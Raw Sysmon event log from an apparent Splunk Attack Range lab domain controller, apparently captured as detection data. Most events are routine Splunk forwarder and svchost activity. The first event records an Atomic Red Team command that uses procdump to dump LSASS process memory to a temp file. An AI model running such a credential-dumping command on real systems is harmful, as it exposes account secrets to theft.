C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E{D28789B6-7CDB-5FA1-1801-000000008801}4404C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp" 10341000x80000000000000005391Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7CDB-5FA1-1B01-000000008801}49884728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CDB-5FA1-1C01-000000008801}1556C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005390Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.311{D28789B6-7CDB-5FA1-1C01-000000008801}1556C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDB-5FA1-1B01-000000008801}4988C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1B01-000000008801}4988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005388Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005387Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005386Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005385Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005384Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005383Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005382Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005381Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005380Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005379Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1B01-000000008801}4988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005378Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7CDB-5FA1-1901-000000008801}50763168C:\Windows\system32\cmd.exe{D28789B6-7CDB-5FA1-1B01-000000008801}4988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005377Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.306{D28789B6-7CDB-5FA1-1B01-000000008801}4988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDB-5FA1-1901-000000008801}5076C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000005376Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1901-000000008801}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005375Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005374Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005373Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005372Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005371Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005370Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005369Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005368Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005367Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005366Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1901-000000008801}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005365Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.294{D28789B6-7CDA-5FA1-1401-000000008801}39961356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CDB-5FA1-1901-000000008801}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005364Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.302{D28789B6-7CDB-5FA1-1901-000000008801}5076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT 